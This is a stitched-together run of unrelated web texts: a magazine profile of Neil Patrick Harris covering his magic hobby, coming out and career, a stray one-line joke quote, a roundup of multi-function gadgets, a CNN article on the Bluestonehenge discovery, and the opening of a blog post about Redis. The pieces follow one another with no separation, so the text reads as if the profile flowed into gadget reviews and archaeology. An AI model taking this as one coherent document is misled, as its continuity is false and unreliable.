“ He ’s making a pass at me , ” Smulders complains .
Harris waggles his tongue like a piece of ham .
Somewhere in there , British role - playing emerges .
“ Let ’s make love and not think about the future — , ” she trills , Merchant Ivory style .
“ Not think about the war , ” Harris moos back , leaning in again .
Harris is warm and professional , but he is also under stress .
He paced back and forth before the first take , as Smulders reassured him that after the Emmys on September 20 — which he is both hosting and co-producing — things would get easier .
When a car ’s engine ruins several takes , he lowers his head , shifting his jaw from side to side .
And the moment the shoot ends , to relieved applause , he rushes into a golf cart .
It ’s already after 9 p.m. , and he ’s flying to New York the next morning , but there ’s more work to come that night , more promotion , preparation , details to nail down .
Harris drives away , on to the next act .
Neil Patrick Harris is a magician .
I mean this literally : Harris is on the board of directors of the Magic Castle , that dorky - fabulous private club in Los Angeles , where the world ’s magicians gather to carouse in black tie and exchange intra-magical secrets — an institution memorably parodied on Arrested Development as the Gothic Castle .
He attends meetings to set club policy .
Last October , he hosted the Magic Awards ceremony in Las Vegas , and recently directed another member ’s one - man show .
Years before he was launched into teen stardom on Doogie Howser , M.D. , Steven Bochco ’s late - eighties drama about a teenage surgeon , Harris was a dedicated magic geek , saving his allowance for visits to see his grandparents in Albuquerque — buying sponge balls , thumb tips , hot rods , then practicing obsessively during the three - hour drive back to the small town of Ruidoso , New Mexico .
An obsession with magic requires a particular personality type : the nerd extrovert .
“ When you go to a magic conference , and you spend time with 500 magician people , you start to realize … trends , ” he says with an arched eyebrow .
“ It ’s the coolest hobby in the world , but people tend to get into magic because no one would talk to them . ”
Once you ’ve learned that charm , though , everyone wants to talk to you .
And as a celebrity , Harris has managed to pull off a truly elegant trick , something no male actor has done to date — he has come out as gay without stunting his career .
Instead , his fame has spiked upward .
“ Our little Neil has really blown up this year , ” Smulders tells me in the break room , and it ’s true : Harris , who is 36 , has become almost supernaturally productive , a kind of human variety show in a range of genres , high and low , mass and niche .
With his boyish likability , a gift for banter in the style of Cary Grant ( or Hugh Grant — really any Grant ) , and a versatile range of skills , Harris seems poised to become the first out gay actor to become an A - list star .
His recent résumé is exhausting to contemplate :
There ’s How I Met Your Mother , a witty underdog series finally getting ratings and critical attention .
There ’s the Emmys , for which he has also been nominated for best supporting actor .
In April , Harris hosted the TVLand Awards ; in June , the Tonys .
He ’s had numerous guest spots with his friend Kelly Ripa ; he ’s appeared on The View and Top Chef Masters and Big Brother ; he recently did a guest - judge gig on American Idol .
In the two Harold & Kumar stoner movies , Harris played a spectacularly filthy version of himself ; his voice is also featured in the sweet children ’s film Cloudy With a Chance of Meatballs .
On Broadway , he received excellent reviews as Lee Harvey Oswald in Sondheim ’s dark masterpiece Assassins , and during the writers ’ strike , he starred in Joss Whedon ’s online musical Dr. Horrible ’s Sing - Along Blog — which is now also nominated for an Emmy .
In fact , researching Harris opens up a cavalcade of YouTube clips : a hilarious Les Misérables duet with his sitcom co-star Jason Segel , charming turns as the Fairy Shoe Person on Sesame Street , a role in Prop 8 — The Musical on the Internet comedy site Funny or Die , a poignant solo as Tobias in Sweeney Todd , a memorable guest - hosting gig on Saturday Night Live , even an Old Spice ad in which he struts through a hospital wearing a stethoscope , explaining earnestly , “ I used to be a doctor for pretend . ”
Photo : Art Streiber
In person , Harris is a graceful presence : tall and charismatic , with hollow cheeks , a rangy muscularity , and three expressive lines on his forehead .
He lounges , legs spread , on his office sofa , wearing a suit and tie .
A bronze skull sits on the coffee table ; there ’s a suitcase bar near the bathroom .
On the shelf is a framed picture of his long - term boyfriend , David Burtka , bed - headed , smiling up from white sheets .
I mention that I ’m staying at the Magic Castle Hotel , and he hocks me playfully .
“ You do know it ’s not affiliated with the Magic Castle , right ? ” he says , looking concerned .
“ Is it all creepy and Bates Motel ?
Or cool and magicky ? ”
He glances down at his silver Mac , flooded with Emmy e-mails .
This is Harris ’s first major producing gig , and it ’s more complicated than he ’d expected .
“ This may very well be the last year they ’re on a network show , ” he says of the Emmys on CBS , which he was invited to join after he got credit for the highest Tony ratings in years .
“ This wheel contract they have , where each year a different network gets the show , as the ratings decline it becomes less of a good thing to ‘ get it . ’
It ’s a very expensive show .
Which means they have to get more ad revenue .
Ads are less expensive , because ratings are down .
So you have to do more ads , which makes the show smaller — and inevitably , when it goes to ABC , the same thing will happen , and finally someone will do it on cable , where there wo n’t be any commercials .
Which will be a wonderful show .
Our three - hour show is only two hours and five minutes long , due to economics . ”
Still , he ’s trying to insert his taste into the proceedings .
He ’d love this year ’s installment to be the “ Classy Emmys , ” he says , with self - mocking air quotes .
Superb dancing .
Uncheesy musical guests .
He originally wanted the Muppets for the opening number — Statler and Waldorf up in the balcony !— but that plan proved too difficult to stage .
Muppets as an opening act are very much within Harris ’s own aesthetic .
Along with magic , he adores variety shows , Buster Keaton , slapstick and acrobatics , cryptography and treasure hunts .
He worships Sondheim ; he collects puzzles .
He ’s obsessed with competitive reality games — and friendly with several reality stars , including Dr. Will Kirby from Big Brother .
He ’s “ very reverential ” about puppets and has been reading Street Gang , a history of Sesame Street .
( He hopes to reinvent the children ’s - show format someday . )
For his 30th birthday , friends created an elaborate scavenger hunt , involving kidnapping and horseback rides .
The man is seemingly incapable of having a conversation without making a reference to Cirque du Soleil .
This spring , in his spare time , he produced a Hollywood version of Accomplice , an interactive theatrical game in which participants mingle with actors and solve puzzles .
This is the stuff that most attracts him , he tells me — anything stylized , abstract , requiring skill and practice .
At a recent magic conference , Harris marveled at the dexterity of the younger magicians .
“ These card kids are like crystal - meth - heads , they ’re so good .
I say that as a compliment .
They ’re 13 years old , and they can do six cuts — that requires sitting for , like , five hours a day , just practicing cuts . ”
He discusses his own performances this way , too , as a technical achievement .
“ For me , I ’ve always had a desire to know how things were done .
How things worked . ”
Though he respects
Method actors , who delve deeply into motivation and history , seeking to become the character , Harris prefers to work from the outside in .
“ When we were filming Dr. Horrible , I was imagining watching it in my living room .
When I ’m co-hosting with Kelly Ripa , I ’m not thinking Neil the Actor , I ’m thinking , Housewife , ironing clothes , eleven o’clock .
What kind of thing does she want to see ? ”
You talk a lot about the audience , I point out .
“ Well , that ’s what we ’re doing , is n’t it ? ” he says .
“ We ’re performing for people . ”
Coming out is its own kind of theatrical performance :
It ’s a reveal .
For most of show - business history , it ’s been more like an exposure — often in the aftermath of a scandal , as with George Michael .
But then there was Ellen DeGeneres , whose famous “ Yep , I ’m Gay ” on the cover of Time seemed to presage a new era of openness , an end to the double life .
Instead , it hobbled her career until she returned , years later , as a talk - show host .
That was twelve years ago , and each year there ’s more give in the social fabric , with openly gay newscasters ( Rachel Maddow ) , talk - show hosts ( Rosie O’Donnell ) , singers ( Michael Stipe ) , American Idols ( Adam Lambert ) , comics ( Mario Cantone ) , and actresses ( Wanda Sykes , Sara Gilbert , Portia de Rossi , Cynthia Nixon ) .
Even some long - closeted female stars have quietly shifted their status , including Lily Tomlin , Jodie Foster , and , most recently , Kelly McGillis .
Photo : Clockwise from left , 20th Century Fox / Everett Collection ; New Line Cinema / Everett Collection ; Cliff Lipson / Courtesy of CBS ; Jeff Vespa / WireImage ; Dimitrios Kambouris / WireImage for Tony Awards
Yet there ’s one set of performers for whom coming out is still considered a career death sentence : male actors , particularly those who play romantic leads or star in action films .
The few who are out — Alan Cumming , Nathan Lane , David Hyde Pierce , Ian McKellan — are seen as niche performers .
Rupert Everett , once a contender for the first Gay Bond , has been relegated to the margins of the industry .
When Grey ’s Anatomy ’s T. R. Knight came out , it underlined his lack of chemistry with his female co-stars .
Meanwhile , a retinue of major stars hover in limbo , their relationships haunted by the suspicion that it ’s all for show , their performances ( onscreen or on talk shows ) scrutinized for indicators of some hidden self .
The assumption is that they have little choice , since the conventional wisdom has n’t budged :
An out male star can never be a leading man .
Straight women wo n’t be able to fantasize about him ; straight men wo n’t be able to relate .
Harris has violated all these expectations .
He staged his own revelation beautifully , with a clear and upbeat statement for People magazine in 2006 , an interview with Out , and a good - sport appearance on Howard Stern , in which he shot back “ whatever you please , man ” when asked whether he was a top or a bottom .
The idea all along has been to acknowledge the fact of his sexuality , then change the subject to his talent .
Still , there was a kind of alchemy involved .
Maybe it was Harris ’s easy style of masculinity , at once unthreatening and seductive .
Maybe the timing was right , coming after he ’d proved he was more than a Trivial Pursuit punch line .
Or maybe he ’d learned , from his own extended personal coming - out process , how to handle the expectations of a wider audience .
Harris is careful never to complain about stardom .
He always adds a caveat explaining that he is very lucky , that he is grateful for every opportunity , that he has learned a lot .
But if there ’s a strain of early fame that feels like heavenly power — when you ’re the most super - popular person in the room and everyone wants you to take them to bed — that ’s clearly not what Neil Patrick Harris experienced at 16 .
Mention Doogie Howser , M.D. , the diary - keeping prodigy he played on the show , and Harris ’s whole body language changes .
He grimaces , and an extra diagonal line on his forehead appears like an arrow pointing far away .
Back in those strange L.A. years , Harris says , he was preoccupied almost entirely by work .
It was a distraction that allowed him not to think about dating .
“ There were gay adults in L.A. , and that kind of made me panic a bit ? ”
His voice rises uncertainly with the memory .
“ Made me a little sweaty in my palms — and uncomfortable .
That was just kind of the elephant in the room .
Or not the elephant in the room , but the ringing in my ears : that that was some sort of horrible inevitability .
And I tried many different angles to head in a different direction .
Dating different girls , being the funny , witty guy at the party , to avoid being the sexual being .
I was n’t thought of in a sexual way , which is easy when you have big ears and the neck and are called Doogie all the time .
So I just never really contemplated physicalizing any kind of sexual ideas until much , much later . ”
Harris had been launched into stardom as a child , when playwright Mark Medoff ( who ’d discovered him at drama camp ) cast him as a child of a broken marriage in the movie Clara ’s Heart .
It was a different time , he points out :
There were no LGBT school groups , few openly gay figures of any kind , no out peers he could talk to .
“ Back in the late eighties , there were lots of kids that for all intents and purposes , now you think they ’re gay , but back then , they just seemed kind of hip .
I mean , Depeche Mode was cool back then — so if a guy had blond streaks in his hair and wore a painter ’s cap sideways and overalls with one of the straps dangling down , you did n’t raise an eyebrow . ”
The result was an acute self - consciousness , exacerbated by the attention he received when he became a poster boy for TV Guide .
( “ He loves candy bars … He thinks his allowance is too low … But , ooh , those Hollywood girls ! ” )
“ I was a late bloomer , and when you ’re a youngster , and you ’re in the public , and people are recognizing you — it ’s hard to behave normally .
It was like a circus sideshow .
You ’d wear a hat and walk fast , because if someone recognized you , they ’d shout your character ’s name .
And no one would come up — it was just like everyone was watching you , whatever you did . ”
Photo : Art Streiber for New York Magazine
When the show was canceled in 1993 , Harris went through a period of retreat .
He made some lightweight but lucrative TV movies ; then , at 25 , he appeared in the L.A. company of Rent , an experience he found liberating .
“ This gypsy world of people who are just so appreciative of each other ’s individuality ! ”
Harris says , grinning at the memory , his arms held wide .
“ Where some people are super - gay and have girlfriends or boyfriends for twenty years , and others swing both ways — or are straight and have a wife but they ’re okay with gay men giving them foot massages and do n’t freak out .
And you ’re singing about that : no day but today , and there ’s only us and there ’s only this , and do n’t regret . ”
The audience became a mirror for his own struggles .
“ You can see young couples , old - guy couples , clutching each other , openly sobbing , ” he tells me .
“ And you ’re singing at them , to them , sobbing too .
It ’s very cathartic .
And it certainly put to rest my weird personal concerns , because there ’s a much bigger picture . ”
Harris also went home to New Mexico for a few years , to live in an adobe house with some “ rock - climbing friends . ”
He went through the self - help seminar the Forum ( up two levels ) and to a Tony Robbins seminar in Mexico .
He slowly came out to friends and family , including his parents , lawyers who now own a restaurant in Albuquerque .
There was some disappointment , but also a lot of “ bear hugs ” from people who said they already knew .
“ Everyone has their ‘ rackets , ’ ” he says — a Forum term for psychological blockages — “ and for me it was the recognition from when I was younger :
It was hard for me to not see everything through the veil of that .
But , you know , when you ’re interacting on a self - help level with a 68 - year - old woman who was molested at 10 and it ruined her life , it puts a lot of things in perspective . ”
Finally , Harris committed to the fact that “ if I wanted to be in the business , I had to be in the business . ”
It ’s a cliché that Hollywood actors go back to “ their first love , the stage ” when they ca n’t get parts , and Harris recognized that for producers , his teen - idol name was something to lure ticket buyers .
But there was also his undeniable talent .
In New York , he took over the Alan Cumming part as the ambisexual emcee in Cabaret , and in 2004 took a challenging dual role in Assassins , a politically charged production that was postponed initially after 9/11 .
“ That forced me to be much more full - body and much more in tune with a savvy audience member — they ’re much more discerning , ” he says , recalling the trial - by - fire that was the audience at Assassins .
“ Some nights , standing ovations .
And some nights , people would literally refuse to applaud and just scowl at us . ”
“ I was n’t thought of in a sexual way , which is easy when you have big ears and are called Doogie all the time . ”
His time in Cabaret lent Harris a different sort of freedom .
“ That was also extraordinarily liberating , but more in a Sam Mendes , weird , Cirque du Soleil kind of way .
It was n’t just ‘ musical - theater world , ’ it was real ” — his voice drops an octave — “ rrrough .
It was dirty , and everyone could have been sued , or won , for sexual harassment .
I ’d be standing stage left , upstairs , with a cigarette in my hand , and two girls would come by and start fondling me and sucking on my neck and then leave .
And I ’d push ’em away and sit on someone ’s lap and grab their junk .
It was insane ! ” He laughs out loud .
“ It was an insane time . ”
He emerged from these experiences as a very different performer from the child actor he ’d been , with that puff of apricot hair and owlish watchfulness .
He was physically adroit and sexually self - confident .
And instead of cringing from his relationship with an audience — bridling at the mutual manipulation , the necessary seduction — he had begun to lean into it .
It was also while starring in Cabaret that he met actor David Burtka , who was playing Tulsa in Gypsy .
Like Harris , Burtka was “ a relationship guy , ” and at first Harris assumed he was straight and dating a mutual female friend , Kate Reinders , who played Baby June .
“ I said , ‘ Oh , Kate , nicely done . ’ ” But Burtka was already involved , raising twins with his long - term male partner .
“ So I sort of gazed from afar until that had run its course .
And thankfully I got to hear from Kate on the phone , every now and again , when she ’d say , ‘ They ’re fighting !
They ’re fighting !
You might have your chance ! ’ ”
After Burtka and his partner broke up , he and Harris went on a date , “ and it was all very quick and fast and I ’m still head over heels and we ’re five - plus years in . ”
Like many stage actors , Burtka had never been in the closet :
In live theater , it ’s accepted that a wide proportion of performers are gay .
“ We yin and yang very well , ” says Harris .
“ We ’re both Geminis , but I , you can probably tell , I process what the options are , and figure out what to say , and he tends to just say what he is feeling .
I ’m just bowled over by him .
He ’s made my life exponentially more livable .
He ’s just — great .
I ’m his forever protector , and I ’m happiest when he ’s happy . ”
For several years , Harris was out privately but in the press maintained the “ glass closet ” situation common these days among young gay actors .
There were no fake girlfriends , but he did n’t mind answering a People - magazine question about his “ dream date , ” leaving out a pronoun .
When he heard about the script for Harold & Kumar , in which he plays a coke - snorting former child actor named Neil Patrick Harris who rants about craving “ fur burgers , ” he was unsettled — was his gayness part of the joke ?
( The writers actually had no idea he was gay , although they did during the sequel .
“ The character we wrote is n’t gay , ” says Harold co-writer Hayden Schlossberg .
“ He might even be slightly homophobic . ” )
Harris turned the role into an outrageous exorcism of his own teen - idol past ; the poster for the sequel even showed him on a unicorn , with the tagline “ What Would NPH Do ? ”
He asked to be credited as “ Neil Patrick Harris , ” not “ Himself ” : “ I did n’t want it to seem like I was saying , ‘ Hey , America , I ’m really like this ! ’ ”
He also was n’t precisely out when he was cast as Barney Stinson on How I Met Your Mother in 2005 , although he brought Burtka to the first cast barbecue .
But as Harris ’s star rose , it became inevitable that his life — however open to those who knew him — might become a tabloid story .
The blogger Perez Hilton was on the attack .
And Harris and his team met to strategize , striving to make their statement succinct and positive .
“ No one was ever old - school Hollywood , with a cigar in their mouth , saying ‘ You ca n’t do this , see !
It ’ll ruin your career , kid . ’ ” With his mild New Age streak , Harris expresses faith that intentions are what matter : “ So long as you ’re representing yourself well , you ’re making good choices for good reasons , all of the circumstantial things will vanish . ”
Now Harris and Burtka walk the red carpets together .
They wear rings , although they are not legally married .
Despite rumors of a surrogate , they are not having a child yet , he tells me , but he believes “ we ’d make very good parents . ”
( When they spend time with Burtka ’s twins , Harris says he gets to “ be the fun guy who takes them to Disneyland . ” )
The psychological effects of being closeted are well documented .
But living in a “ glass closet ” has its own risks , since any sexual references a celebrity makes — toward either sex — risk coming off as coy , even hypocritical .
Some actors ( Jodie Foster comes to mind ) respond by developing an oddly asexual vibe .
But perversely , Harris ’s wholesome statement to People about being “ a very content gay man , ” paired with his marital stability , seems to have freed him up to be a polymorphously flirtatious celebrity , catalyzing crushes from all corners .
When we talk about the danger that his new romantic plotline might alter the character of Barney , taking away his ability to make “ tit jokes , ” Harris veers into a description of his co-stars , both new moms : “ They have great tits this year , by the way .
They ’re both milking , so they have these fantastic , real ” — he makes a very Barney - esque gesture — “ they ’re amazing , I ca n’t stop staring at their breasts , all of them . ”
When a reporter asked him about seeing Jason Segel ’s penis full - frontal in Forgetting Sarah Marshall , Harris deadpanned , “ He ’s very interested in what I think of his genitals … He ’s got such a huge crush on me , I did n’t want to let him down . ”
On our second meeting , he rather randomly brought up a bachelor party he ’d attended at the Lower East Side nightclub , The Box : “ It ’s so dark and awesome ! ” he raved happily about one of the club ’s notorious stage shows .
“ This woman , she started nude , and then she dressed herself by pulling things out of her Afro .
And then her vagina .
And then her butthole . ”
In his late twenties , shortly after he starred in Rent , Harris was inspired by Danny Roberts , a gay cast member on The Real World : New Orleans .
“ He was a unique entity at that time , as someone who was seemingly so confident in their own skin that they did n’t need to wear their sexuality , uh — ” He begins to stumble slightly , realizing he ’s about to cross into a minefield of rhetorical missteps .
“ Or to flaunt their sexuality ?
To be more of one thing or another . ”
He pauses to rethink .
“ And I — it ’s a personal thing , I suppose , but I personally responded to his lack of overt grandstanding .
Again , tricky waters , because if I say something like ‘ He did n’t wave flags , ’ it sounds like I ’m disrespecting people that do , who I think are tremendously important , but there ’s more than one way to get into people ’s psyches . ”
Danny was also distinctly masculine , I point out : the first gay cast member who could easily pass as straight .
“ Oh , he was very sexy , but everyone thought so , ” says Harris drily .
“ One wants to be sexy to everyone . ”
It ’s one advantage of coming out , he tells me : “ As Barney , I get to make out with all sorts of girls .
And I ’m allowed to say that women are sexy and not have them say , ‘ That ’s not true ! ’
But I ’m now in a really fun position , where I can tell a guy that he ’s sexy , and most ” — he raises an eyebrow — “ are n’t put off by that . ”
“ Love looks like love on a human face , ” Joss Whedon says about casting Harris as the straight anti-hero of Dr. Horrible , a role that depends on the audience ’s belief in the character ’s romantic obsession .
Whedon knew Harris from his Broadway roles ; he ’d auditioned him for a part in his short - lived Fox series Firefly .
But for Dr. Horrible , an experimental musical about a nerd who dreams of being a super - villain , Harris was Whedon ’s first choice .
He could sing , he could dance , he could project the yearning and fury that ground the stylized plot .
Next year , Harris plays a married father in The Best and the Brightest , an upcoming independent comedy about New York private - school admissions , also starring Amy Sedaris .
First - time director Josh Shelov tells me he was looking for a comic actor who , in contrast to the slacker style of many contemporary actors , could exude masculine maturity .
“ There was a four - second conversation about sexuality , ” he recalls of the day the question was raised .
“ But our team were big How I Met Your Mother fans .
And we basically felt like the audience has spoken already , they ’ve said they find him acceptable in a straight role .
There ’s no stigma here , it ’s a pure talent issue at this point . ”
This is Harris ’s own version of breaking the Bro Code :
By shuttling so easily along the continuum of masculinity , from frat - boy stud to dapper showman , he ’s raised questions about what might be possible for other actors , gay and straight .
It ’s an attitude that meshes nicely with current comedy culture , in which soft - spoken actors like Michael Cera are romantic - comedy leads , and “ bromances ” abound .
If more actors were out , if the larger culture felt more like the accepting Utopia Harris glimpsed during Rent , perhaps masculinity might feel like just another performance — something playful , not scary or loaded .
I ask Harris if he ’d ever found himself watching , as many young gay men do , other men for hints of how to “ pass . ”
He finds a different way into the question .
“ I always felt uncomfortable in my skin .
To this day , I feel like my posture ’s weird , and certain parts of my body , I do n’t feel like I use them like I should . ”
He pauses .
“ But I do n’t know .
I ’ve seen certain people who feel they should act more overtly masculine , to either prove something to others or hide something from others .
But I ’ve always thought people should act to accomplish whatever they need to get .
I do n’t feel like if you ’re talking professionally with your boss — if you talk strip clubs with him if he ’s the kind of person who goes to strip clubs — that means you ’re being a kiss - ass .
It just means that you ’re being effective . ”
A few days later , Harris appears on Letterman .
I meet him the next morning at a Starbucks near his Harlem apartment , which he and Burtka have had for three years .
As we stand in line for oatmeal , I ask how Letterman went and he looks quizzical , even behind his movie - star sunglasses .
It was “ weird , ” he says , letting those three forehead lines do the wave .
“ When the ‘ Top Ten ’ list is n’t that funny , he can be grouchy .
I think he knows I can take it , so he sort of — came at me .
It was a little strange . ”
I TiVo the show .
It is strange .
Harris makes pleasant banter about a CBS - paid trip on the Orient Express .
In response , Letterman snarls like a prosecutor .
At one point , he chuckles sourly , “ I appreciate it , you ’re doing your own segues .
Do n’t count on me for anything tonight . ”
Harris sidesteps the hostility , even when Letterman addresses him , out of nowhere , as “ Mr. Limo Driver Suit . ”
In daylight , Harris seems slighter , less showmanlike than he was on the set .
He ’s been grinding through Emmy details , he tells me , trying to fit the pieces of that stubborn puzzle .
With the Muppet number not an option , they ’d planned to film a new comic “ cold open . ”
Unfortunately , “ due to budgetary restraints and Alec Baldwin pulling an about - face , we ’ve had to scrap the whole thing . ”
Why did Baldwin drop out ?
I ask him .
“ That seems to be the question of the hour , ” he says , doing that eyebrow thing .
Interrupted by polite fans , we discuss his plans for the future .
He ’d “ love to be Ed Sullivan ” someday ; he has a concept for an interactive kids ’ show .
But I realize I ’m privately bridling at any suggestion of him moving behind the scenes , becoming a host like Ellen , like Rosie , instead of opening movies : I want him to be the Great Gay Hope — the one who shows that it can be done .
“ I appreciate that , ” he tells me .
“ But it feels weird to own that . ”
He does n’t want to be the “ litmus test , ” he tells me , “ because I ’m suddenly ‘ that guy . ’ ”
Maybe this is its own kind of Houdini act , as difficult as coming out of the closet or even escaping teen stardom .
Lower yourself into the role - model box and you might never break those chains .
I offer him a deck of cards and ask him to demonstrate a trick : to show me how to “ force ” a card on the audience .
He does so , patiently , with a polite “ Well played ! ”
But he also lets me know there are limits to his tolerance .
“ It goes against my nature to be teaching journalists the secrets to card tricks .
Soon I ’ll be like the Masked Magician , a pariah .
Some dumbass named Valentino who is n’t welcome in the magic world , so much . ”
He has to fly back to L.A. , but before he leaves , he describes the scavenger hunt his friends arranged for his birthday .
Despite his fascination with games , he ended up 1,000 feet off course : “ I had a compass , but it was supposed to be reversed . ”
Lately , he ’s been poring over the journals of online scavenger hunt players , reverse - engineering their methods from the inside out .
That ’s the thing about puzzles one has n’t mastered yet , he tells me .
“ I like to know that there are solutions .
I do n’t have to solve it necessarily .
But I like to know it can be done . ”
Watch Neil Patrick Harris clips and read more by Emily Nussbaum at her TV blog , SURF .
Basically what I ’m saying is once you gain the ability of flight you can talk to birds and airplanes and possibly become friends with them .
- Ray
TV chef Alton Brown has it right : Unitaskers – specialty devices that only perform one function – have no place in the kitchen .
And single - purpose gadgets have no place in your pocket .
The same way lemon zesters to garlic presses clutter up kitchen drawers and cabinets , electronic voice recorders and standalone CD players fill up your briefcase and entertainment center without ever justifying their existence in more than one very limited way .
Though we may make exceptions for purebred machines that far outperform their all - in - one counterparts , most gadgets need to earn their keep in a multitude of ways .
Here are 10 of our favorite do - it - all devices .
Once a down - and - out contender in the world of video games , the PlayStation 3 has shown itself to be far more popular as a home theater machine , and after the $ 100 price drop that came with the new slim version , you could call it a bargain , too .
Besides serving up video games in the daytime hours , it doubles as Blu-ray player at night , and with an active Internet connection , you can rent and buy movies online from Sony , stream your movie collection from a networked computer , and even surf the Web with the built - in browser .
Apple iPhone 3GS 16GB $ 200 with contract from AT&T
Smartphones all pull double and triple duty as do - it - all devices , but Apple ’s iPhone stands out as leader of the pack when it comes to sheer flexibility .
Right out of the box , it serves as a phone , Internet browser , GPS navigator , and personal media player .
Add in 85,000 apps and counting from the overflowing App Store – many of which are free or extremely cheap – and the iPhone becomes a gaming platform , tip calculator , song identifier , cookbook , sonar ruler , restaurant finder , portable TV , and whatever else the hive mind of thousands of creative geeks dreams up .
Digital photo frames make a clever way to get your pictures off memory cards and into the living room , but with a little bit of extra hardware , they can perform a lot of extra tricks , too .
HP ’s DreamScreen rolls with other premium photo frames by displaying photos directly from SD cards and online sites like Snapfish and Facebook , but also goes a step further .
It will play music from Pandora and HP SmartRadio , play movies , display a five - day weather forecast , and even act as an alarm clock , with your favorite music as the wakeup call .
Yes , all computers make good multitaskers , but a unique combination of low prices and portability make netbooks even more versatile .
Lenovo ’s S12 gets our vote as one of the finest because of the 12 - inch screen , which we consider the bare minimum for a notebook you can use every day – not just in travel situations .
And a new version that will sport Nvidia ’s Ion graphics processor will retail for only $ 50 more when it launches in late October , but give it enough grunt for light gaming and even 1080 p video playback , making it a potential HTPC candidate .
Why bother buying a Bluetooth headset in addition to wireless earphones when you can just get one product that serves as both ?
Sony Ericsson ’s IS800 fits that bill by offering the A2DP Bluetooth profile for high - quality uncompressed sound , plus a built - in mic for use as a headset .
Used in conjunction with a smartphone that ’s also a PMP , it ’s truly one headset to rule them all .
To keep your arsenal of gadgets juiced up and powered on the road , you can send keep a rat ’s nest of different specialty chargers in the glove box , or just this handy inverter , which lets you use the same home chargers that came with the device .
Not only will it convert your car ’s standard 12V DC power supply to 120V AC for electronics like laptops , it also offers dual USB ports for all those gadgets with USB charging cables ( these days , just about all of them ) .
It ’s hard to recommend a standalone printer when all - in - one machines have gotten this good – and inexpensive .
HP ’s Officejet J3680 acts as a standalone office army by handling printing , faxing , copying and scanning , all from one machine .
There ’s even a built - in phone for impromptu calls from your fax line .
Until the world finally abandons the fax machine , it ’s one affordable way to stay tapped into 30 - year - old tech without hanging on to more junker in the closet .
Whether you spend your afternoons in college lecture halls or board rooms , you probably need to carry a pen anyway , so you might as well carry one that does more than just feed out ink .
Livescribe ’s Pulse is more like a computer in a pen .
It records everything you write on paper in digital form using an infrared camera , along with capturing simultaneous audio notes with a built - in mic .
At a later point , you can play back the audio by tapping on different things you ’ve written , or even download the audio and notes to a PC via a USB connection , and convert the handwritten notes to digital text with aftermarket software .
Excessive ?
Maybe , but the extra notes will go a long way from a shelf full of dog - eared spiral - bound notebooks when it ’s time to cram for an exam , or remember exactly what your boss wanted you to do by Tuesday
We loved the Flip Mino HD , Kodak Zi6 , and Creative Vado HD , but all these mini HD camcorders have one problem :
They do n’t do anything besides shoot YouTube - caliber gag reels .
Fortunately , the last new crop of point - and - shoot cameras brought us plenty of models that shoot 720 p video alongside taking stellar still shots .
Canon ’s SX200IS also captures HD - quality video in a compact package , but brings big - boy features like a 12 - megapixel sensor , 12 x zoom and optical image stabilization to the game .
Struggling to find enough place around your car ’s cramped dashboard for a head unit , movie screen , and GPS ?
Get rid of the mobile - command - center look by rolling them into one device with Pioneer ’s ludicriously spendy AVIC - X710 BT .
It offers turn - by - turn voice - guided GPS navigation , iPod connectivity , Bluetooth connectivity for integrating your cell phone into your stereo system , USB and SD card slots , MP3 , WMA , WAV , and iTunes AAC playback .
Just remember to keep your eyes on the road , OK ?
Editors ' Recommendations
( CNN ) -- Stonehenge , an enigma to visitors and scientists alike for so many years , became less of a mystery after a discovery announced to the world this week .
A stone circle discovered near Stonehenge may suggest the prehistoric monument was part of a funeral route .
Archaeologists have unearthed a new stone circle near Stonehenge that lends credence to the theory that the famous prehistoric monument in Britain was part of a funeral complex .
University of Bristol archaeologist Joshua Pollard described the new find as " incredible " because it establishes Stonehenge as part of a larger ceremonial complex linked to the nearby River Avon .
" No one could have predicted there was another stone circle so close by , " said Pollard , co-director of the excavation project that began in 2004 .
This , he said , changes the perception of the popular tourist destination 90 miles west of London .
The new find , dubbed " Bluestonehenge " after the color of the 25 Welsh stones of which it was once composed , sits along the Avon a mile away from its famous sister circle , Pollard said .
Neolithic peoples would have come down river by boat and literally stepped off into Bluestonehenge , Pollard said .
They may have congregated at certain times of the year , including the winter solstice , and carried remains of the dead from Bluestonehenge down an almost two - mile funeral processional route to a cemetery at Stonehenge to bury them .
" It could be that Bluestonehenge was where the dead began their final journey to Stonehenge , " said Mike Parker Pearson , an archaeologist at the University of Sheffield who co-directed the project with Pollard .
" Not many people know that Stonehenge was Britain 's largest burial ground at that time , " he said .
" Maybe the blue stone circle is where people were cremated before their ashes were buried at Stonehenge itself . "
Proof of life artifacts -- pottery , animal bones , food residues and flint tools used in the Stone Age -- are decidedly absent at Stonehenge but were found upstream in a village discovered by the excavation team in 2005 , leading researchers to believe that Stonehenge was indeed a burial ground .
But people have debated the purpose of Stonehenge for decades .
Known for its orientation in relation to the rising and setting sun , the circle of stones represented a prehistoric temple to some .
Others argued it was an astronomical observatory .
Or that it was a marker of time .
But Pollard is sticking to his theory .
He said others have not based their suppositions on archaeological finds .
Archaeologists began the latest excavation with the hope of tracking the course of the avenue that led to Stonehenge .
They had no idea they would stumble upon a second circle that would help uncover the mystery of Stonehenge .
The stones at Bluestonehenge were removed thousands of years ago , Pollard said , but the sizes of the remaining pits , about 33 feet in diameter , point to giant blue stones from the Preseli Mountains of Wales , about 150 miles away .
Pollard said that Neolithic people dragged the pillarlike blue stones along the processional route to Stonehenge to incorporate them in a major rebuilding that took place around 2500 B.C. Archaeologists know that after 2500 , Stonehenge consisted of about 60 Welsh stones and 83 local sarsen stones .
Some of the blue stones that once stood on the river 's edge probably now stand within the center of Stonehenge , Pollard said .
Scientists plan to use radiocarbon dating techniques to better understand the history of the entire site .
Stonehenge remains as striking as ever .
But with each new find , the enigma fades just a little .
All About Stonehenge • Archaeology
Why I like Redis
I ’ve been getting a lot of useful work done with Redis recently .
Redis is typically categorised as yet another of those new - fangled NoSQL key / value stores , but if you look closer it actually has some pretty unique characteristics .
It makes more sense to describe it as a “ data structure server ” — it provides a network service that exposes persistent storage and operations over dictionaries , lists , sets and string values .
Think memcached but with list and set operations and persistence - to - disk .
It ’s also incredibly easy to set up , ridiculously fast ( 30,000 read or writes a second on my laptop with the default configuration ) and has an interesting approach to persistence .
Redis runs in memory , but syncs to disk every Y seconds or after every X operations .
Sounds risky , but it supports replication out of the box so if you ’re worried about losing data should a server fail you can always ensure you have a replicated copy to hand .
I would n’t trust my only copy of critical data to it , but there are plenty of other cases for which it is really well suited .
I ’m currently not using it for data storage at all — instead , I use it as a tool for processing data using the interactive Python interpreter .
I ’m a huge fan of REPLs .
When programming Python , I spend most of my time in an IPython prompt .
With JavaScript , I use the Firebug console .
I experiment with APIs , get something working and paste it over in to a text editor .
